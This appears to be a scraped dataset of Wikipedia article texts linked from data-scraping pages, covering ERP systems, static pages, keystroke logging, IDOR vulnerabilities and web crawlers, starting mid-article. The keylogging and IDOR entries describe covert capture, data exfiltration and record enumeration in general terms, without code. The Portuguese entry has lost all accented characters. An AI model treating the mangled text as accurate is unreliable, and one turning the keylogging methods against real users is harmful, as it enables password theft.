system capabilities within the organization, it goes beyond the corporate walls to interact with other systems. Enterprise application suite is an alternate name for such systems. ERP II systems are typically used to enable collaborative initiatives such as supply chain management (SCM), customer relationship management (CRM) and business intelligence (BI) among business partner organizations through the use of various electronic business technologies. 20 21 The large proportion of companies are pursuing a strong managerial targets in ERP system instead of acquire a ERP company. 22 Developers now make more effort to integrate mobile devices with the ERP system. ERP vendors are extending ERP to these devices, along with other business applications, so that businesses don't have to rely on third-party applications. 23 As an example, the e-commerce platform Shopify was able to make ERP tools from Microsoft and Oracle available on its app in October 2021. 23 Technical stakes of modern ERP concern integration—hardware, applications, networking, supply chains. ERP now covers more functions and roles—including decision making, stakeholders' relationships, standardization, transparency, globalization, etc. 24 ERP systems typically include the following characteristics: An ERP system covers the following common functional areas. In many ERP systems, these are called and grouped together as ERP modules: Government resource planning (GRP) is the equivalent of an ERP for the public sector and an integrated office automation system for government bodies. 26 The software structure, modularization, core algorithms and main interfaces do not differ from other ERPs, and ERP software suppliers manage to adapt their systems to government agencies. 27 28 29 Both system implementations, in private and public organizations, are adopted to improve productivity and overall business performance in organizations, but comparisons (private vs. public) of implementations shows that the main factors influencing ERP implementation success in the public sector are cultural. 30 31 32 Most ERP systems incorporate best practices. This means the software reflects the vendor's interpretation of the most effective way to perform each business process. Systems vary in how conveniently the customer can modify these practices. 33 Use of best practices eases compliance with requirements such as IFRS, Sarbanes-Oxley, or Basel II. They can also help comply with de facto industry standards, such as electronic funds transfer. This is because the procedure can be readily codified within the ERP software and replicated with confidence across multiple businesses that share that business requirement. 34 35 ERP systems connect to real time data and transaction data in a variety of ways. These systems are typically configured by systems integrators, who bring unique knowledge on process, equipment, and vendor solutions. Direct integration ERP systems have connectivity (communications to plant floor equipment) as part of their product offering. This requires that the vendors offer specific support for the plant floor equipment their customers operate. Database integration ERP systems connect to plant floor data sources through staging tables in a database. Plant floor systems deposit the necessary information into the database. The ERP system reads the information in the table. The benefit of staging is that ERP vendors do not need to master the complexities of equipment integration. Connectivity becomes the responsibility of the systems integrator. Enterprise appliance transaction modules (EATM) These devices communicate directly with plant floor equipment and with the ERP system via methods supported by the ERP system. EATM can employ a staging table, web services, or system specific program interfaces (APIs). An EATM offers the benefit of being an off the shelf solution. Custom integration solutions Many system integrators offer custom solutions. These systems tend to have the highest level of initial integration cost, and can have a higher long term maintenance and reliability costs. Long term costs can be minimized through careful system testing and thorough documentation. Custom integrated solutions typically run on workstation or server-class computers. ERP's scope usually implies significant changes to staff work processes and practices. 36 Generally, three types of services are available to help implement such changes: consulting, customization, and support. 36 Implementation time depends on business size, number of modules, customization, the scope of process changes, and the readiness of the customer to take ownership for the project. Modular ERP systems can be implemented in stages. The typical project for a large enterprise takes about 14 months and requires around 150 consultants. 37 Small projects can require months; multinational and other large implementations can take years. 38 39 Customization can substantially increase implementation times. 37 Besides that, information processing influences various business functions e.g. some large corporations like Walmart use a just in time inventory system. This reduces inventory storage and increases delivery efficiency, and requires up-to-date data. Before 2014, Walmart used a system called Inforem developed by IBM to manage replenishment. 40 Implementing ERP typically requires changes in existing business processes. 41 Poor understanding of needed process changes prior to starting implementation is a main reason for project failure. 42 The difficulties could be related to the system, business process, infrastructure, training, or lack of motivation. It is therefore crucial that organizations thoroughly analyze processes before they deploy an ERP software. Analysis can identify opportunities for process modernization. It also enables an assessment of the alignment of current processes with those provided by the ERP system. Research indicates that risk of business process mismatch is decreased by: ERP implementation is considerably more difficult (and politically charged) in decentralized organizations, because they often have different processes, business rules, data semantics, authorization hierarchies, and decision centers. 45 This may require migrating some business units before others, delaying implementation to work through the necessary changes for each unit, possibly reducing integration (e.g., linking via master data management) or customizing the system to meet specific needs. 46 A potential disadvantage is that adopting "standard" processes can lead to a loss of competitive advantage. While this has happened, losses in one area are often offset by gains in other areas, increasing overall competitive advantage. 47 48 Configuring an ERP system is largely a matter of balancing the way the organization wants the system to work, and the way the system is designed to work out of the box. ERP systems typically include many configurable settings that in effect modify system operations. For example, in the ServiceNow platform, business rules can be written requiring the signature of a business owner within 2 weeks of a newly completed risk assessment. The tool can be configured to automatically email notifications to the business owner, and transition the risk assessment to various stages in the process depending on the owner's responses or lack thereof. Two-tier ERP software and hardware lets companies run the equivalent of two ERP systems at once: one at the corporate level and one at the division or subsidiary level. For example, a manufacturing company could use an ERP system to manage across the organization using independent global or regional distribution, production or sales centers, and service providers to support the main company's customers. Each independent center (or) subsidiary may have its own business operations cycles, workflows, and business processes. Given the realities of globalization, enterprises continuously evaluate how to optimize their regional, divisional, and product or manufacturing strategies to support strategic goals and reduce time-to-market while increasing profitability and delivering value. 49 With two-tier ERP, the regional distribution, production, or sales centers and service providers continue operating under their own business model—separate from the main company, using their own ERP systems. Since these smaller companies' processes and workflows are not tied to main company's processes and workflows, they can respond to local business requirements in multiple locations. 50 Factors that affect enterprises' adoption of two-tier ERP systems include: ERP systems are theoretically based on industry best practices, and their makers intend that organizations deploy them "as is". 53 54 ERP vendors do offer customers configuration options that let organizations incorporate their own business rules, but gaps in features often remain even after configuration is complete. ERP customers have several options to reconcile feature gaps, each with their own pros cons. Technical solutions include rewriting part of the delivered software, writing a homegrown module to work within the ERP system, or interfacing to an external system. These three options constitute varying degrees of system customization—with the first being the most invasive and costly to maintain. 55 Alternatively, there are non-technical options such as changing business practices or organizational policies to better match the delivered ERP feature set. Key differences between customization and configuration include: Advantages of customization include: Customization's disadvantages include that it may: ERP systems can be extended with third party software, often via vendor-supplied interfaces. 59 60 Extensions offer features such as: 60 Data migration is the process of moving, copying, and restructuring data from an existing system to the ERP system. Migration is critical to implementation success and requires significant planning. Unfortunately, since migration is one of the final activities before the production phase, it often receives insufficient attention. The following steps can structure migration planning: 61 Often, data migration is incomplete because some of the data in the existing system is either incompatible or not needed in the new system. As such, the existing system may need to be kept as an archived database to refer back to once the new ERP system is in place. 61 The most fundamental advantage of ERP is that the integration of a myriad of business processes saves time and expense. Management can make decisions faster and with fewer errors. Data becomes visible across the organization. Tasks that benefit from this integration include: 62 ERP systems centralize business data, which: Critical success factors are limited number of areas in which results, if satisfactory, will ensure the organization's successful competitive performance. The CSF method has helped organizations specify their own critical information needs. Achieving satisfactory results in the key areas of critical success factors can ensure competitive advantage leading to improved organizational performance and overcome the challenges faced by organizations. Critical success factors theoretical foundation was improved upon, verified, and validated by several researchers, which underscored the importance of CSFs and its application to ERP project implementations. 71 The application of critical success factors can prevent organizations from making costly mistakes, and the effective usage of CSFs can ensure project success and reduce failures during project implementations. Some of the important critical success factors related to ERP projects are: Know your data, longer and more integrated testing, utilization of the right people, longer stabilization period (hyper-care), clear communication, early buy-in from business, have a Lean Agile program, less customization, ERP projects must be business-driven and not IT-driven. 71 Research published in 2011 based on a survey of 225 manufacturers, retailers and distributors found "high" rates of interest and adoption of ERP systems and that very few businesses were "completely untouched" by the concept of an ERP system. 27% of the companies survey had a fully operational system, 12% were at that time rolling out a system and 26% had an existing ERP system which they were extending or upgrading. 72 The term "postmodern ERP" was coined by Gartner in 2013, when it first appeared in the paper series "Predicts 2014". 73 According to Gartner's definition of the postmodern ERP strategy, legacy, monolithic and highly customized ERP suites, in which all parts are heavily reliant on each other, should sooner or later be replaced by a mixture of both cloud-based and on-premises applications, which are more loosely coupled and can be easily exchanged if needed. 73 The basic idea is that there should still be a core ERP solution that would cover most important business functions, while other functions will be covered by specialist software solutions that merely extend the core ERP. This concept is similar to the "best-of-breed" approach 74 to software execution, but it shouldn't be confused with it. While in both cases, applications that make up the whole are relatively loosely connected and quite easily interchangeable, in the case of the latter there is no ERP solution whatsoever. Instead, every business function is covered by a separate software solution. 75 There is, however, no golden rule as to what business functions should be part of the core ERP, and what should be covered by supplementary solutions. According to Gartner, every company must define their own postmodern ERP strategy, based on company's internal and external needs, operations and processes. 73 For example, a company may define that the core ERP solution should cover those business processes that must stay behind the firewall, and therefore, choose to leave their core ERP on-premises. At the same time, another company may decide to host the core ERP solution in the cloud and move only a few ERP modules as supplementary solutions to on-premises. citation needed The main benefits that companies will gain from implementing postmodern ERP strategy are speed and flexibility when reacting to unexpected changes in business processes or on the organizational level. citation needed With the majority of applications having a relatively loose connection, it is fairly easy to replace or upgrade them whenever necessary. In addition to that, following the examples above, companies can select and combine cloud-based and on-premises solutions that are most suited for their ERP needs. The downside of postmodern ERP is that it will most likely lead to an increased number of software vendors that companies will have to manage, as well as pose additional integration challenges for the central IT. 76 |
239 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:Contact_us | Introduction Readers How to report a problem with an article, or find out more information. Article subjects Problems with articles about you, your company, or somebody you represent. Licensing How to copy Wikipedia's information, donate your own, or report unlicensed use of your information. Donors Find out about the process, how to donate, and information about how your money is spent. Press and partnerships If you're a member of the press looking to contact Wikipedia, or have a business proposal for us. Back to main page Thank you for your interest in contacting Wikipedia. Before proceeding, some important disclaimers: The links on the left should direct you to how to contact us or resolve problems. If you cannot find your issue listed there, you can email helpful, experienced volunteers at info-enwikimedia.org. Please refrain from emailing about disagreements with content; they will not be resolved via email. |
240 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Static_web_page | A static web page, sometimes called a flat page or a stationary page, is a web page that is delivered to a web browser exactly as stored, 1 in contrast to dynamic web pages which are generated by a web application. 2 Consequently, a static web page displays the same information for all users, from all contexts, subject to modern capabilities of a web server to negotiate content-type or language of the document where such versions are available and the server is configured to do so. 3 However, a webpage's JavaScript can introduce dynamic functionality which may make the static web page dynamic. Static web pages are often HTML documents, 4 stored as files in the file system and made available by the web server over HTTP (nevertheless URLs ending with .html" are not always static). However, loose interpretations of the term could include web pages stored in a database, and could even include pages formatted using a template and served through an application server, as long as the page served is unchanging and presented essentially as stored. The content of static web pages remain stationary irrespective of the number of times it is viewed. Such web pages are suitable for the contents that rarely need to be updated, though modern web template systems are changing this. Maintaining large numbers of static pages as files can be impractical without automated tools, such as static site generators. Any personalization or interactivity has to run client-side, which is restricting. 5 Static site generators are applications that compile static websites - typically populating HTML templates in a predefined folder and file structure, with content supplied in a format such as Markdown or AsciiDoc. Examples of static site generators include: |
241 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Keystroke_logging | Keystroke logging, often referred to as keylogging or keyboard capturing, is the action of recording (logging) the keys struck on a keyboard, 1 2 typically covertly, so that a person using the keyboard is unaware that their actions are being monitored. Data can then be retrieved by the person operating the logging program. A keystroke recorder or keylogger can be either software or hardware. While the programs themselves are legal, 3 with many designed to allow employers to oversee the use of their computers, keyloggers are most often used for stealing passwords and other confidential information. 4 5 Keystroke logging can also be utilized to monitor activities of children in schools or at home and by law enforcement officials to investigate malicious usage. 6 Keylogging can also be used to study keystroke dynamics 7 or human-computer interaction. Numerous keylogging methods exist, ranging from hardware and software-based approaches to acoustic cryptanalysis. In the mid 1970s, the Soviet Union developed and deployed a hardware keylogger targeting typewriters. Termed the "selectric bug", it measured the movements of the print head of IBM Selectric typewriters via subtle influences on the regional magnetic field caused by the rotation and movements of the print head. 8 An early keylogger was written by Perry Kivolowitz and posted to the Usenet newsgroup net.unix-wizards, net.sources on November 17, 1983. 9 The posting seems to be a motivating factor in restricting access to dev kmem on Unix systems. The user-mode program operated by locating and dumping character lists (clients) as they were assembled in the Unix kernel. In the 1970s, spies installed keystroke loggers in the US Embassy and Consulate buildings in Moscow. 10 11 They installed the bugs in Selectric II and Selectric III electric typewriters. 12 Soviet embassies used manual typewriters, rather than electric typewriters, for classified information—apparently because they are immune to such bugs. 12 As of 2013, Russian special services still use typewriters. 11 13 14 A software-based keylogger is a computer program designed to record any input from the keyboard. 15 Keyloggers are used in IT organizations to troubleshoot technical problems with computers and business networks. Families and businesspeople use keyloggers legally to monitor network usage without their users' direct knowledge. Microsoft publicly stated that Windows 10 has a built-in keylogger in its final version "to improve typing and writing services". 16 However, malicious individuals can use keyloggers on public computers to steal passwords or credit card information. Most keyloggers are not stopped by HTTPS encryption because that only protects data in transit between computers; software-based keyloggers run on the affected user's computer, reading keyboard inputs directly as the user types. From a technical perspective, there are several categories: Since 2006, Keystroke logging has been an established research method for the study of writing processes. 21 22 Different programs have been developed to collect online process data of writing activities, 23 including Inputlog, Scriptlog, Translog and GGXLog. Keystroke logging is used legitimately as a suitable research instrument in several writing contexts. These include studies on cognitive writing processes, which include Keystroke logging can be used to research writing, specifically. It can also be integrated into educational domains for second language learning, programming skills, and typing skills. Software keyloggers may be augmented with features that capture user information without relying on keyboard key presses as the sole input. Some of these features include: Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system. Writing simple software applications for keylogging can be trivial, and like any nefarious computer program, can be distributed as a trojan horse or as part of a virus. What is not trivial for an attacker, however, is installing a covert keystroke logger without getting caught and downloading data that has been logged without being traced. An attacker that manually connects to a host machine to download logged keystrokes risks being traced. A trojan that sends keylogged data to a fixed e-mail address or IP address risks exposing the attacker. Researchers Adam Young and Moti Yung discussed several methods of sending keystroke logging. They presented a deniable password snatching attack in which the keystroke logging trojan is installed using a virus or worm. An attacker who is caught with the virus or worm can claim to be a victim. The cryptotrojan asymmetrically encrypts the pilfered login password pairs using the public key of the trojan author and covertly broadcasts the resulting ciphertext. They mentioned that the ciphertext can be steganographically encoded and posted to a public bulletin board such as Usenet. 44 45 In 2000, the FBI used FlashCrest iSpy to obtain the PGP passphrase of Nicodemo Scarfo, Jr., son of mob boss Nicodemo Scarfo. 46 Also in 2000, the FBI lured two suspected Russian cybercriminals to the US in an elaborate ruse, and captured their usernames and passwords with a keylogger that was covertly installed on a machine that they used to access their computers in Russia. The FBI then used these credentials to gain access to the suspects' computers in Russia to obtain evidence to prosecute them. 47 The effectiveness of countermeasures varies because keyloggers use a variety of techniques to capture data and the countermeasure needs to be effective against the particular data capture technique. In the case of Windows 10 keylogging by Microsoft, changing certain privacy settings may disable it. 48 An on-screen keyboard will be effective against hardware keyloggers; transparency clarification needed will defeat some—but not all—screen loggers. An anti-spyware application that can only disable hook-based keyloggers will be ineffective against kernel-based keyloggers. Keylogger program authors may be able to update their program's code to adapt to countermeasures that have proven effective against it. An anti-keylogger is a piece of software specifically designed to detect keyloggers on a computer, typically comparing all files in the computer against a database of keyloggers, looking for similarities which might indicate the presence of a hidden keylogger. As anti-keyloggers have been designed specifically to detect keyloggers, they have the potential to be more effective than conventional antivirus software; some antivirus software do not consider keyloggers to be malware, as under some circumstances a keylogger can be considered a legitimate piece of software. 49 Rebooting the computer using a Live CD or write-protected Live USB is a possible countermeasure against software keyloggers if the CD is clean of malware and the operating system contained on it is secured and fully patched so that it cannot be infected as soon as it is started. Booting a different operating system does not impact the use of a hardware or BIOS based keylogger. Many anti-spyware applications can detect some software based keyloggers and quarantine, disable, or remove them. However, because many keylogging programs are legitimate pieces of software under some circumstances, anti-spyware often neglects to label keylogging programs as spyware or a virus. These applications can detect software-based keyloggers based on patterns in executable code, heuristics and keylogger behaviors (such as the use of hooks and certain APIs). No software-based anti-spyware application can be 100% effective against all keyloggers. 50 Software-based anti-spyware cannot defeat non-software keyloggers (for example, hardware keyloggers attached to keyboards will always receive keystrokes before any software-based anti-spyware application). The particular technique that the anti-spyware application uses will influence its potential effectiveness against software keyloggers. As a general rule, anti-spyware applications with higher privileges will defeat keyloggers with lower privileges. For example, a hook-based anti-spyware application cannot defeat a kernel-based keylogger (as the keylogger will receive the keystroke messages before the anti-spyware application), but it could potentially defeat hook- and API-based keyloggers. Network monitors (also known as reverse-firewalls) can be used to alert the user whenever an application attempts to make a network connection. This gives the user the chance to prevent the keylogger from "phoning home" with their typed information. Automatic form-filling programs may prevent keylogging by removing the requirement for a user to type personal details and passwords using the keyboard. Form fillers are primarily designed for Web browsers to fill in checkout pages and log users into their accounts. Once the user's account and credit card information has been entered into the program, it will be automatically entered into forms without ever using the keyboard or clipboard, thereby reducing the possibility that private data is being recorded. However, someone with physical access to the machine may still be able to install software that can intercept this information elsewhere in the operating system or while in transit on the network. (Transport Layer Security (TLS) reduces the risk that data in transit may be intercepted by network sniffers and proxy tools.) Using one-time passwords may prevent unauthorized access to an account which has had its login details exposed to an attacker via a keylogger, as each password is invalidated as soon as it is used. This solution may be useful for someone using a public computer. However, an attacker who has remote control over such a computer can simply wait for the victim to enter their credentials before performing unauthorized transactions on their behalf while their session is active. Another common way to protect access codes from being stolen by keystroke loggers is by asking users to provide a few randomly selected characters from their authentication code. For example, they might be asked to enter the 2nd, 5th, and 8th characters. Even if someone is watching the user or using a keystroke logger, they would only get a few characters from the code without knowing their positions. 51 Use of smart cards or other security tokens may improve security against replay attacks in the face of a successful keylogging attack, as accessing protected information would require both the (hardware) security token as well as the appropriate password passphrase. Knowing the keystrokes, mouse actions, display, clipboard, etc. used on one computer will not subsequently help an attacker gain access to the protected resource. Some security tokens work as a type of hardware-assisted one-time password system, and others implement a cryptographic challenge response authentication, which can improve security in a manner conceptually similar to one time passwords. Smartcard readers and their associated keypads for PIN entry may be vulnerable to keystroke logging through a so-called supply chain attack 52 where an attacker substitutes the card reader PIN entry hardware for one which records the user's PIN. Most on-screen keyboards (such as the on-screen keyboard that comes with Windows XP) send normal keyboard event messages to the external target program to type text. Software key loggers can log these typed characters sent from one program to another. 53 Keystroke interference software is also available. 54 These programs attempt to trick keyloggers by introducing random keystrokes, although this simply results in the keylogger recording more information than it needs to. An attacker has the task of extracting the keystrokes of interest—the security of this mechanism, specifically how well it stands up to cryptanalysis, is unclear. Similar to on-screen keyboards, speech-to-text conversion software can also be used against keyloggers, since there are no typing or mouse movements involved. The weakest point of using voice-recognition software may be how the software sends the recognized text to target software after the user's speech has been processed. Many PDAs and lately tablet PCs can already convert pen (also called stylus) movements on their touchscreens to computer understandable text successfully. Mouse gestures use this principle by using mouse movements instead of a stylus. Mouse gesture programs convert these strokes to user-definable actions, such as typing text. Similarly, graphics tablets and light pens can be used to input these gestures, however, these are becoming less common. timeframe? The same potential weakness of speech recognition applies to this technique as well. With the help of many programs, a seemingly meaningless text can be expanded to a meaningful text and most of the time context-sensitively, e.g. "en.wikipedia.org" can be expanded when a web browser window has the focus. The biggest weakness of this technique is that these programs send their keystrokes directly to the target program. However, this can be overcome by using the 'alternating' technique described below, i.e. sending mouse clicks to non-responsive areas of the target program, sending meaningless keys, sending another mouse click to the target area (e.g. password field) and switching back-and-forth. Alternating between typing the login credentials and typing characters somewhere else in the focus window 55 can cause a keylogger to record more information than it needs to, but this could be easily filtered out by an attacker. Similarly, a user can move their cursor using the mouse while typing, causing the logged keystrokes to be in the wrong order e.g., by typing a password beginning with the last letter and then using the mouse to move the cursor for each subsequent letter. Lastly, someone can also use context menus to remove, cut, copy, and paste parts of the typed text without using the keyboard. An attacker who can capture only parts of a password will have a larger key space to attack if they choose to execute a brute-force attack. Another very similar technique uses the fact that any selected text portion is replaced by the next key typed. e.g., if the password is "secret", one could type "s", then some dummy keys "asdf". These dummy characters could then be selected with the mouse, and the next character from the password "e" typed, which replaces the dummy characters "asdf". These techniques assume incorrectly that keystroke logging software cannot directly monitor the clipboard, the selected text in a form, or take a screenshot every time a keystroke or mouse click occurs. They may, however, be effective against some hardware keyloggers. Media related to Keystroke logging at Wikimedia Commons |
242 | https://en.wikipedia.org/wiki/Data_scraping | https://pt.wikipedia.org/wiki/Raspagem_de_dados | Data scraping (em portugu s, raspagem de dados) uma t cnica computacional na qual um programa extrai dados de sa da leg vel somente para humanos, proveniente de um servi o ou aplicativo. Os dados extra dos geralmente s o minerados e estruturados em um formato padr o como CSV, XML ou JSON. 1 Normalmente, a transfer ncia de dados feita utilizando-se estrutura de dados adequadas para processos automatizados por computadores, e n o por humanos. Tais comunica es de formato e protocolo s o rigidamente estruturados, documentados, facilmente analisado, mantendo a ambiguidade ao m nimo. 1 A raspagem de dados mais frequentemente realizada em servi os ou aplicativos web legados ou aqueles que n o oferecem uma interface de programa o de aplica o. Neste ltimo caso, geralmente os respons veis pelo servi o ou aplica o consideram a raspagem de dados como indesejada, possivelmente pela sobrecarga do sistema, perda de receita por propagandas, ou pela perda do controle do conte do da informa o. 1 A extra o de dados muitas vezes considerada ad hoc, uma t cnica deselegante, frequentemente utilizada como ltimo recurso quando n o h outro mecanismo de interc mbio de dados. P ginas Web s o constru das utilizando-se linguagens de marca o baseadas em textos (HTML e XHTML), e frequentemente cont m uma riqueza de dados textuais teis. No entanto, a maioria das p ginas da web s o projetados para usu rios finais humanos e n o para uso automatizado. Devido a isso, criou-se ferramentas que raspam conte dos da web. Um web scraping uma API para extrair dados de um web site. Empresas como a Amazon AWS e Google fornecem ferramentas de extra o, servi os e dados p blicos dispon veis sem custo para os usu rios finais. 1 Novas formas de web scraping envolvem capturar feeds de dados de servidores web. Por exemplo, JSON comumente usado como um mecanismo de armazenamento de transporte entre o cliente e o servidor web. Recentemente, as empresas t m desenvolvido sistemas web que dependem de t cnicas em an lise do Modelo de Objeto de Documentos, vis o computacional e processamento de linguagem natural para simular o processamento humano que ocorre ao visualizar uma p gina da web para extrair automaticamente informa es teis. Screen scraping uma t cnica de raspagem geralmente associada recolha program tica de dados visuais a partir de uma origem, ao contr rio da extra o de dados textuais como a web scraping. Originalmente, screen scraping o processo de obten o de dados textuais a partir de uma tela de computador ou um arquivo de imagem. |
243 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Insecure_direct_object_reference | Insecure direct object reference (IDOR) is a type of access control vulnerability in digital security. 1 This can occur when a web application or application programming interface uses an identifier for direct access to an object in an internal database but does not check for access control or authentication. For example, if the request URL sent to a web site directly uses an easily enumerated unique identifier (such as http: foo.com doc 1234), that can provide an exploit for unintended access to all records. A directory traversal attack is considered a special case of a IDOR. 2 The vulnerability is of such significant concern that for many years it was listed as one of the Open Web Application Security Project’s (OWASP) Top 10 vulnerabilities. 3 In November 2020, the firm Silent Breach identified an IDOR vulnerability with the United States Department of Defense web site and privately reported it via the DOD's Vulnerability Disclosure Program. The bug was fixed by adding a user session mechanism to the account system, which would require authenticating on the site first. 4 It was reported that the Parler social networking service used sequential post IDs, and that this had enabled the scraping of terabytes of data from the service in January 2021. The researcher responsible for the project has said this was inaccurate. 5 6 This computer security article is a stub. You can help Wikipedia by expanding it. |
244 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_crawler | A Web crawler, sometimes called a spider or spiderbot and often shortened to crawler, is an Internet bot that systematically browses the World Wide Web and that is typically operated by search engines for the purpose of Web indexing (web spidering). 1 Web search engines and some other websites use Web crawling or spidering software to update their web content or indices of other sites' web content. Web crawlers copy pages for processing by a search engine, which indexes the downloaded pages so that users can search more efficiently. Crawlers consume resources on visited systems and often visit sites unprompted. Issues of schedule, load, and "politeness" come into play when large collections of pages are accessed. Mechanisms exist for public sites not wishing to be crawled to make this known to the crawling agent. For example, including a robots.txt file can request bots to index only parts of a website, or nothing at all. The number of Internet pages is extremely large; even the largest crawlers fall short of making a complete index. For this reason, search engines struggled to give relevant search results in the early years of the World Wide Web, before 2000. Today, relevant results are given almost instantly. Crawlers can validate hyperlinks and HTML code. They can also be used for web scraping and data-driven programming. A web crawler is also known as a spider, 2 an ant, an automatic indexer, 3 or (in the FOAF software context) a Web scutter. 4 A Web crawler starts with a list of URLs to visit. Those first URLs are called the seeds. As the crawler visits these URLs, by communicating with web servers that respond to those URLs, it identifies all the hyperlinks in the retrieved web pages and adds them to the list of URLs to visit, called the crawl frontier. URLs from the frontier are recursively visited according to a set of policies. If the crawler is performing archiving of websites (or web archiving), it copies and saves the information as it goes. The archives are usually stored in such a way they can be viewed, read and navigated as if they were on the live web, but are preserved as 'snapshots'. 5 The archive is known as the repository and is designed to store and manage the collection of web pages. The repository only stores HTML pages and these pages are stored as distinct files. A repository is similar to any other system that stores data, like a modern-day database. The only difference is that a repository does not need all the functionality offered by a database system. The repository stores the most recent version of the web page retrieved by the crawler. citation needed The large volume implies the crawler can only download a limited number of the Web pages within a given time, so it needs to prioritize its downloads. The high rate of change can imply the pages might have already been updated or even deleted. The number of possible URLs crawled being generated by server-side software has also made it difficult for web crawlers to avoid retrieving duplicate content. Endless combinations of HTTP GET (URL-based) parameters exist, of which only a small selection will actually return unique content. For example, a simple online photo gallery may offer three options to users, as specified through HTTP GET parameters in the URL. If there exist four ways to sort images, three choices of thumbnail size, two file formats, and an option to disable user-provided content, then the same set of content can be accessed with 48 different URLs, all of which may be linked on the site. This mathematical combination creates a problem for crawlers, as they must sort through endless combinations of relatively minor scripted changes in order to retrieve unique content. As Edwards et al. noted, "Given that the bandwidth for conducting crawls is neither infinite nor free, it is becoming essential to crawl the Web in not only a scalable, but efficient way, if some reasonable measure of quality or freshness is to be maintained. 6 A crawler must carefully choose at each step which pages to visit next. The behavior of a Web crawler is the outcome of a combination of policies: 7 Given the current size of the Web, even large search engines cover only a portion of the publicly available part. A 2009 study showed even large-scale search engines index no more than 40 70% of the indexable Web; 8 a previous study by Steve Lawrence and Lee Giles showed that no search engine indexed more than 16% of the Web in 1999. 9 As a crawler always downloads just a fraction of the Web pages, it is highly desirable for the downloaded fraction to contain the most relevant pages and not just a random sample of the Web. This requires a metric of importance for prioritizing Web pages. The importance of a page is a function of its intrinsic quality, its popularity in terms of links or visits, and even of its URL (the latter is the case of vertical search engines restricted to a single top-level domain, or search engines restricted to a fixed Web site). Designing a good selection policy has an added difficulty: it must work with partial information, as the complete set of Web pages is not known during crawling. Junghoo Cho et al. made the first study on policies for crawling scheduling. Their data set was a 180,000 pages crawl from the stanford.edu domain, in which a crawling simulation was done with different strategies. 10 The ordering metrics tested were breadth-first, backlink count and partial PageRank calculations. One of the conclusions was that if the crawler wants to download pages with high Pagerank early during the crawling process, then the partial Pagerank strategy is the better, followed by breadth-first and backlink-count. However, these results are for just a single domain. Cho also wrote his PhD dissertation at Stanford on web crawling. 11 Najork and Wiener performed an actual crawl on 328 million pages, using breadth-first ordering. 12 They found that a breadth-first crawl captures pages with high Pagerank early in the crawl (but they did not compare this strategy against other strategies). The explanation given by the authors for this result is that "the most important pages have many links to them from numerous hosts, and those links will be found early, regardless of on which host or page the crawl originates. Abiteboul designed a crawling strategy based on an algorithm called OPIC (On-line Page Importance Computation). 13 In OPIC, each page is given an initial sum of "cash" that is distributed equally among the pages it points to. It is similar to a PageRank computation, but it is faster and is only done in one step. An OPIC-driven crawler downloads first the pages in the crawling frontier with higher amounts of "cash". Experiments were carried in a 100,000 pages synthetic graph with a power-law distribution of in-links. However, there was no comparison with other strategies nor experiments in the real Web. Boldi et al. used simulation on subsets of the Web of 40 million pages from the .it domain and 100 million pages from the WebBase crawl, testing breadth-first against depth-first, random ordering and an omniscient strategy. The comparison was based on how well PageRank computed on a partial crawl approximates the true PageRank value. Some visits that accumulate PageRank very quickly (most notably, breadth-first and the omniscient visit) provide very poor progressive approximations. 14 15 Baeza-Yates et al. used simulation on two subsets of the Web of 3 million pages from the .gr and .cl domain, testing several crawling strategies. 16 They showed that both the OPIC strategy and a strategy that uses the length of the per-site queues are better than breadth-first crawling, and that it is also very effective to use a previous crawl, when it is available, to guide the current one. Daneshpajouh et al. designed a community based algorithm for discovering good seeds. 17 Their method crawls web pages with high PageRank from different communities in less iteration in comparison with crawl starting from random seeds. One can extract good seed from a previously-crawled-Web graph using this new method. Using these seeds, a new crawl can be very effective. A crawler may only want to seek out HTML pages and avoid all other MIME types. In order to request only HTML resources, a crawler may make an HTTP HEAD request to determine a Web resource's MIME type before requesting the entire resource with a GET request. To avoid making numerous HEAD requests, a crawler may examine the URL and only request a resource if the URL ends with certain characters such as .html, .htm, .asp, .aspx, .php, .jsp, .jspx or a slash. This strategy may cause numerous HTML Web resources to be unintentionally skipped. Some crawlers may also avoid requesting any resources that have a ? in them (are dynamically produced) in order to avoid spider traps that may cause the crawler to download an infinite number of URLs from a Web site. This strategy is unreliable if the site uses URL rewriting to simplify its URLs. Crawlers usually perform some type of URL normalization in order to avoid crawling the same resource more than once. The term URL normalization, also called URL canonicalization, refers to the process of modifying and standardizing a URL in a consistent manner. There are several types of normalization that may be performed including conversion of URLs to lowercase, removal of . and .. segments, and adding trailing slashes to the non-empty path component. 18 Some crawlers intend to download upload as many resources as possible from a particular web site. So path-ascending crawler was introduced that would ascend to every path in each URL that it intends to crawl. 19 For example, when given a seed URL of http: llama.org hamster monkey page.html, it will attempt to crawl hamster monkey , hamster , and . Cothey found that a path-ascending crawler was very effective in finding isolated resources, or resources for which no inbound link would have been found in regular crawling. The importance of a page for a crawler can also be expressed as a function of the similarity of a page to a given query. Web crawlers that attempt to download pages that are similar to each other are called focused crawler or topical crawlers. The concepts of topical and focused crawling were first introduced by Filippo Menczer 20 21 and by Soumen Chakrabarti et al. 22 The main problem in focused crawling is that in the context of a Web crawler, we would like to be able to predict the similarity of the text of a given page to the query before actually downloading the page. A possible predictor is the anchor text of links; this was the approach taken by Pinkerton 23 in the first web crawler of the early days of the Web. Diligenti et al. 24 propose using the complete content of the pages already visited to infer the similarity between the driving query and the pages that have not been visited yet. The performance of a focused crawling depends mostly on the richness of links in the specific topic being searched, and a focused crawling usually relies on a general Web search engine for providing starting points. An example of the focused crawlers are academic crawlers, which crawls free-access academic related documents, such as the citeseerxbot, which is the crawler of CiteSeerX search engine. Other academic search engines are Google Scholar and Microsoft Academic Search etc. Because most academic papers are published in PDF formats, such kind of crawler is particularly interested in crawling PDF, PostScript files, Microsoft Word including their zipped formats. Because of this, general open-source crawlers, such as Heritrix, must be customized to filter out other MIME types, or a middleware is used to extract these documents out and import them to the focused crawl database and repository. 25 Identifying whether these documents are academic or not is challenging and can add a significant overhead to the crawling process, so this is performed as a post crawling process using machine learning or regular expression algorithms. These academic documents are usually obtained from home pages of faculties and students or from publication page of research institutes. Because academic documents make up only a small fraction of all web pages, a good seed selection is important in boosting the efficiencies of these web crawlers. 26 Other academic crawlers may download plain text and HTML 